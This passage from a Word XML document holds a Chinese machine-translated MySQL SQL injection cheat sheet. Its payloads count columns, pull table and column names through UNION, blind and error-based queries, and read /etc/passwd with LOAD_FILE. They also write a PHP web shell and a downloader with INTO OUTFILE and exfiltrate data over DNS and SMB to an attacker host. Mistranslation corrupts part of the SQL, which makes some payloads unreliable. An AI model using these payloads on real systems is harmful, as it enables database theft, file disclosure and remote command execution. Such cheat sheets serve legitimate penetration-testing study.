                      <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                      <w:i w:val="0"/>
                      <w:iCs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8"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>1'订购2 - +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Fonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                      <w:i w:val="0"/>
                      <w:iCs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8"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>真正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66" w:type="dxa"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:bidi w:val="0"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                      <w:i w:val="0"/>
                      <w:iCs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8"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>1'订购3 - +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Fonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                      <w:i w:val="0"/>
                      <w:iCs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8"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>真正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66" w:type="dxa"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:bidi w:val="0"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                      <w:i w:val="0"/>
                      <w:iCs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8"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>1'订购4 - +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Fonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                      <w:i w:val="0"/>
                      <w:iCs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8"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>False - 查询仅使用3列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66" w:type="dxa"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:bidi w:val="0"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                      <w:i w:val="0"/>
                      <w:iCs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8"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>-1'UNION SELECT 1,2,3 - +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bidi w:val="0"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                      <w:i w:val="0"/>
                      <w:iCs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8"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>真正</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:i w:val="0"/>
                <w:iCs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ind w:left="0"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体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1" w:hRule="atLeast"/>
        </w:trPr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基于错误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GROUP/ORDER BY 1,2,3,4,5...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注意：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与前面的方法类似，如果启用了错误显示，我们可以检查带有1个请求的列数。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br w:type="textWrapping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例子：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鉴于查询 </w:t>
            </w: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 username, password, permission FROM Users WHERE id = '{INJECTION POINT}'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53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bidi w:val="0"/>
                    <w:jc w:val="both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</w:rPr>
                    <w:t>1'GROUP BY 1,2,3,4,5 - +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bidi w:val="0"/>
                    <w:jc w:val="both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</w:rPr>
                    <w:t>'group statement'中的未知列'4'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bidi w:val="0"/>
                    <w:jc w:val="both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</w:rPr>
                    <w:t>1'订购1,2,3,4,5 - +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bidi w:val="0"/>
                    <w:jc w:val="both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</w:rPr>
                    <w:t>'order clause'中的未知列'4'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sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:shd w:val="clear" w:fill="F3F3F7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6" w:hRule="atLeast"/>
        </w:trPr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基于错误2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 ... INTO var_list, var_list1, var_list2...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笔记：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如果启用了错误显示，则此方法有效。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当注入点在LIMIT子句之后时，它可用于查找列数。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br w:type="textWrapping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例：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鉴于查询 </w:t>
            </w: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 permission FROM Users WHERE id = {INJECTION POINT};</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="10"/>
              <w:tblW w:w="1694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20"/>
              <w:gridCol w:w="4320"/>
              <w:gridCol w:w="4153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20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kern w:val="0"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>-1 UNION SELECT 1 INTO @，@，@</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4320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kern w:val="0"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>使用的SELECT语句具有不同的列数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bidi w:val="0"/>
                    <w:jc w:val="both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bidi w:val="0"/>
                    <w:jc w:val="both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20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kern w:val="0"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>-1 UNION SELECT 1 INTO @，@</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4320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kern w:val="0"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>使用的SELECT语句具有不同的列数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bidi w:val="0"/>
                    <w:jc w:val="both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bidi w:val="0"/>
                    <w:jc w:val="both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20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kern w:val="0"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>-1 UNION SELECT 1 INTO @</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4320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kern w:val="0"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>没有错误意味着查询使用1列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bidi w:val="0"/>
                    <w:jc w:val="both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bidi w:val="0"/>
                    <w:jc w:val="both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例2：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鉴于查询 </w:t>
            </w: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 username, permission FROM Users limit 1,{INJECTION POINT};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53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kern w:val="0"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>1 INTO @，@，@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kern w:val="0"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>使用的SELECT语句具有不同的列数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kern w:val="0"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>1 INTO @，@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kern w:val="0"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>没有错误意味着查询使用2列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sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:shd w:val="clear" w:fill="F3F3F7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bidi w:val="0"/>
        <w:rPr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3F3F7"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr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3F3F7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7" w:hRule="atLeast"/>
        </w:trPr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基于错误3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AND (SELECT * FROM SOME_EXISTING_TABLE) = 1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笔记：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如果您知道之后的表名并启用了错误显示，则此方法有效。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它将返回表中的列数，而不是查询。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br w:type="textWrapping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例：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鉴于查询 </w:t>
            </w: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 permission FROM Users WHERE id = {INJECTION POINT};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37"/>
              <w:gridCol w:w="396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4337" w:type="dxa"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:jc w:val="both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kern w:val="0"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>1 AND（SELECT * FROM Users）= 1</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3969" w:type="dxa"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:jc w:val="both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kern w:val="0"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>操作数应包含3列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ind w:left="0"/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检索表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2" w:hRule="atLeast"/>
        </w:trPr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jc w:val="center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联盟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UNION SELECT GROUP_CONCAT（table_name）FROM information_schema.tables WHERE version = 10;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注意：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MySQL 5版本= 10</w:t>
            </w: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0" w:hRule="atLeast"/>
        </w:trPr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Blind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AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns &gt; 'A'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注意：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eastAsia"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang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MySQL 5版本= 10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5" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522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AND（SELECT COUNT（*）FROM（SELECT 1 UNION SELECT null UNION SELECT！1）x GROUP BY CONCAT（（SELECT table_name FROM information_schema.tables LIMIT 1），FLOOR（RAND（0）* 2）））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（@：= 1）|| @ GROUP BY CONCAT（（SELECT table_name FROM information_schema.tables LIMIT 1），！@ ）HAVING @ || MIN（@：= 0）;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（@：= 1）|| @ GROUP BY CONCAT（（SELECT table_name FROM information_schema.tables LIMIT 1），！@ ）HAVING @ || MIN（@：= 0）;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注意：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MySQL 5版本= 10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ind w:left="0"/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检索列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2" w:hRule="atLeast"/>
        </w:trPr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jc w:val="center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联盟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UNION SELECT GROUP_CONCAT（column_name）FROM information_schema.columns WHERE table_name ='tablename'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注意：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MySQL 5版本= 10</w:t>
            </w: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0" w:hRule="atLeast"/>
        </w:trPr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Blind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AND SELECT SUBSTR（column_name，1,1）FROM information_schema.columns&gt;'A'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注意：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eastAsia"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang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MySQL 5版本= 10</w:t>
            </w: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5" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522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AND（SELECT COUNT（*）FROM（SELECT 1 UNION SELECT null UNION SELECT！1）x GROUP BY CONCAT（（SELECT column_name FROM information_schema.columns LIMIT 1），FLOOR（RAND（0）* 2）））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AND（1,2,3）=（SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1） - 在MySQL 5.1中修复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AND（SELECT * FROM（SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b）a）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AND（SELECT * FROM（SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b USING（SOME_EXISTING_COLUMN））a）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注意：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MySQL 5版本= 10</w:t>
            </w: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5" w:hRule="atLeast"/>
        </w:trPr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程序分析()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PROCEDURE ANALYSE()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注意：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Web应用程序必须在您要注入的SQL查询中显示所选列之一。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br w:type="textWrapping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例：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鉴于查询 </w:t>
            </w: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 username, permission FROM Users WHERE id = 1;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92"/>
              <w:gridCol w:w="40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92" w:type="dxa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</w:rPr>
                    <w:t>1程序分析（）</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4014" w:type="dxa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获取第</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi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一</w:t>
                  </w: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列的名称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92" w:type="dxa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</w:rPr>
                    <w:t>1 LIMIT 1,1程序分析（）</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4014" w:type="dxa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获取第二列的名称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92" w:type="dxa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</w:rPr>
                    <w:t>1 LIMIT 2,1 PROCEDURE ANALYZE</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi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()</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4014" w:type="dxa"/>
                </w:tcPr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获取第</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi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三</w:t>
                  </w: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列的名称</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl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ind w:left="0"/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一次检索多个表/列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2" w:hRule="atLeast"/>
        </w:trPr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SELECT（@）FROM（SELECT（@：= 0x00），（SELECT（@）FROM（information_schema.columns）WHERE（table_schema&gt; = @ ）AND（@）IN（@：= CONCAT（@，0x0a，'[' ，table_schema，']&gt;'，table_name，'&gt;'，column_name））））x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br w:type="textWrapping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例：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 * FROM Users WHERE id =' - 1'UNION SELECT 1,2，（SELECT（@）FROM（SELECT（@：= 0x00），（SELECT（@）FROM（information_schema.columns）WHERE（table_schema&gt; = @ ） AND（@）IN（@：= CONCAT（@，0x0a，'['，table_schema，']&gt;'，table_name，'&gt;'，column_name））））x），4 - +';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</w:pP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3F3F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:br w:type="textWrapping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输出：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 xml:space="preserve">[information_schema]&gt; CHARACTER_SETS&gt; CHARACTER_SET_NAME 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 xml:space="preserve">[information_schema]&gt; CHARACTER_SETS&gt; DEFAULT_COLLATE_NAME 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 xml:space="preserve">[information_schema]&gt; CHARACTER_SETS&gt; DESCRIPTION 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 xml:space="preserve">[information_schema]&gt; CHARACTER_SETS&gt; MAXLEN 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 xml:space="preserve">[information_schema]&gt; COLLATIONS&gt; COLLATION_NAME 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 xml:space="preserve">[information_schema]&gt; COLLATIONS&gt; CHARACTER_SET_NAME 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 xml:space="preserve">[information_schema]&gt; COLLATIONS&gt; ID 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 xml:space="preserve">[ information_schema]&gt; COLLATIONS&gt; IS_DEFAULT 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[information_schema]&gt; COLLATIONS&gt; IS_COMPILED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SELEC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T MID（GROUP_CONCAT（0x3c62723e，0x5461626c653a20，table_name，0x3c62723e，0x436f6c756d6e3a20，column_name ORDER BY（SELECT version FROM information_schema.tables）SEPARATOR 0x3c62723e），1,1024）FROM information_schema.columns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例：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</w:t>
            </w:r>
            <w:r>
              <w:rPr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 xml:space="preserve"> usernaem </w:t>
            </w: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FROM Users WHERE id =' - 1'UNION SELECT MID（GROUP_CONCAT（0x3c62723e，0x5461626c653a20，table_name，0x3c62723e，0x436f6c756d6e3a20，column_name ORDER BY（SELECT version FROM information_schema.tables）SEPARATOR 0x3c62723e），1,1024）FROM information_schema.columns - +';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br w:type="textWrapping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输出：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 xml:space="preserve">表：talk_revisions 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 xml:space="preserve">列：revid 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 xml:space="preserve">表：talk_revisions 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 xml:space="preserve">列：userid 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 xml:space="preserve">表：talk_revisions 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列：用户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 xml:space="preserve">表：talk_projects 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列：优先级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ind w:left="0"/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从列名称中查找表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5"/>
        <w:gridCol w:w="3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5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SELECT table_name FROM information_schema.columns WHERE column_name ='username';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3817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查找名为username的任何列的表名。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5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SELECT table_name FROM information_schema.columns WHERE column_name LIKE'％user％';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3817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查找包含单词user的任何列的表名称。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ind w:left="0"/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从表名中查找列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5"/>
        <w:gridCol w:w="3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5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SELECT column_name FROM information_schema.columns WHERE table_name ='Users';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3787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查找Users表的列。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5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SELECT column_name FROM information_schema.columns WHERE table_name LIKE'％user％';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3787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查找包含单词user的任何表的列名。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ind w:left="0"/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找出当前的查询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0"/>
        <w:gridCol w:w="3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SELECT info FROM information_schema.processlist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3802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从MySQL 5.1.7开始提供。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10.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避免使用报价单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0"/>
        <w:gridCol w:w="3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SELECT * FROM Users WHERE username = 0x61646D696E</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3772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十六进制编码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SELECT * FROM Users WHERE username = CHAR（97,100,109,105,110）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3772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CHAR（）函数。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11.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字符串连接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2" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr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 w:firstLine="0" w:firstLine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SELECT 'a''d''mi''n';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 w:firstLine="0" w:firstLine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SELECT CONCAT（'a'，'d'，'m'，'i'，'n'）;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 w:firstLine="0" w:firstLine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SELECT CONCAT_WS（''，'a'，'d'，'m'，'i'，'n'）;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 w:firstLine="0" w:firstLineChars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SELECT GROUP_CONCAT（'a'，'d'，'m'，'i'，'n'）;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笔记：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CONCAT()如果任何参数为NULL，则返回NULL。而是使用CONCAT_WS()。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第一个参数CONCAT_WS()定义了其余参数的分隔符。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12.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条件陈述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6" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="10"/>
              <w:tblW w:w="1682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22"/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/>
                    <w:jc w:val="left"/>
                    <w:textAlignment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8"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>Case</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="830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bidi w:val="0"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:hint="default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/>
                    <w:jc w:val="left"/>
                    <w:textAlignment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8"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>IF（）</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="830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bidi w:val="0"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:hint="default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/>
                    <w:jc w:val="left"/>
                    <w:textAlignment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8"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>IFNULL（）</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="830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bidi w:val="0"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:hint="default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/>
                    <w:ind w:left="0" w:leftChars="0" w:right="0" w:rightChars="0"/>
                    <w:jc w:val="left"/>
                    <w:textAlignment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8"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>NULLIF（）</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="830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bidi w:val="0"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                      <w:b/>
                      <w:bCs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3F3F7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例子：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 IF（ 1 = 1，true，false ） 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Fonts w:hint="default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sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:shd w:val="clear" w:fill="F3F3F7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 CASE WHEN 1 = 1 THEN true ELSE false END ;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13.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定时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2" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr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53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jc w:val="both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8"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>SLEEP()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jc w:val="both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8"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>MySQL 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widowControl w:val="0"/>
                    <w:jc w:val="both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8"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>BENCHMARK()</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4153" w:type="dxa"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:jc w:val="both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8"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>MySQL 4/5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例：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' - （IF（MID（version（），1,1）LIKE 5，BENCHMARK（100000，SHA1（'true'）），false）） - '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14.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特权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="0"/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文件权限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6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以下查询可帮助确定给定用户的FILE权限。</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="10"/>
              <w:tblW w:w="83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050"/>
              <w:gridCol w:w="1755"/>
              <w:gridCol w:w="14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1" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5050" w:type="dxa"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:jc w:val="both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8"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>SELECT file_priv FROM mysql.user WHERE user ='username';</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1755" w:type="dxa"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:jc w:val="both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FFFFF"/>
                    </w:rPr>
                    <w:t>需要root权限</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1495" w:type="dxa"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:jc w:val="both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FFFFF"/>
                    </w:rPr>
                    <w:t>MySQL 4/5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62" w:hRule="atLeast"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5050" w:type="dxa"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:jc w:val="both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8"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%';</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1755" w:type="dxa"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:jc w:val="both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sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:shd w:val="clear" w:fill="FFFFFF"/>
                    </w:rPr>
                    <w:t>无需特权</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1495" w:type="dxa"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:jc w:val="both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aps w:val="0"/>
                      <w:color w:val="000000"/>
                      <w:spacing w:val="0"/>
                      <w:kern w:val="0"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>MySQL 5</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl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13"/>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs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bidi w:val="0"/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15.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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阅读文件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3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如果用户具有FILE权限，则可以读取文件。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LOAD_FILE（）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br w:type="textWrapping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例子：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 LOAD_FILE（ '/ etc / passwd' ） ;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 LOAD_FILE（ 0x2F6574632F706173737764 ） ;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笔记：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文件必须位于服务器主机上。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LOAD_FILE（）的基本目录是@@datadir 。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该文件必须是MySQL用户可读的。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文件大小必须小于max_allowed_packet。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cs="宋体"/>
                <w:b/>
                <w:bCs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默认大小为@@max_allowed_packet</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="13"/>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi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1047552字节。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0"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi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16.写文件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如果用户具有FILE权限，则可以创建文件。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INTO OUTFILE / DUMPFILE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br w:type="textWrapping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例子：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编写PHP shell：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 '&lt;? system($_GET[\'c\']); ?&gt;' INTO OUTFILE '/var/www/shell.php';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然后访问：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http://localhost/shell.php?c=cat%20/etc/passwd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写下载器：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 '&lt;? fwrite(fopen($_GET[f], \'w\'), file_get_contents($_GET[u])); ?&gt;' INTO OUTFILE '/var/www/get.php'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然后访问：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http://localhost/get.php?f=shell.php&amp;u=http://localhost/c99.txt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笔记：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文件无法覆盖INTO OUTFILE 。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INTO OUTFILE必须是查询中的最后一个语句。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无法对路径名进行编码，因此需要引号。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17.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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带外通道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b/>
                <w:bCs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b/>
                <w:bCs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DNS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="13"/>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs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请求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 LOAD_FILE(CONCAT('\\\\foo.',(select MID(version(),1,1)),'.attacker.com\\'));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0"/>
              <w:rPr>
                <w:rStyle w:val="13"/>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs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b/>
                <w:bCs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SMB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="13"/>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs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请求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i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="000000"/>
                <w:spacing w:val="0"/>
                <w:shd w:val="clear" w:fill="F3F3F7"/>
                <w:vertAlign w:val="baseline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' OR 1=1 INTO OUTFILE '\\\\attacker\\SMBshare\\output.txt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0"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:shd w:val="clear" w:fill="F3F3F7"/>
        </w:rPr>
      </w:pP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18.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
